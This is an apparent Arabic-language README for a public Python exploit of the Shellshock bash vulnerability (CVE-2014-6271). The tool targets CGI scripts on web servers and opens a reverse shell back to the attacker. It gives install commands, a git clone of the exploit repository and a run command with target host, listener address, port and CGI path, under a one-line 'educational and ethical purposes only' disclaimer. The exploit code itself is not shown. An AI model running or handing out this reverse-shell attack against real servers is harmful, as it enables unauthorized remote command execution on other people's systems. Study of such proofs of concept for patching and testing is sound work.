
استغلال بايثون لـ CVE-2014-6271 (Shellshock) يستهدف سكربتات CGI الضعيفة مع معالج قشرة عكسية، يدعم HTTP/HTTPS والمسارات المخصصة والبروكسي.
هذا استغلال (Exploit) بلغة بايثون لـ ثغرة Shellshock (CVE-2014-6271)، والتي تؤثر على GNU Bash. يستهدف الاستغلال نصوص CGI على خوادم الويب الضعيفة وينشئ صدفة عكسية (reverse shell) إلى جهاز المهاجم.
CVE-2014-6271
هذه الأداة مخصصة فقط للأغراض التعليمية والأخلاقية.
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg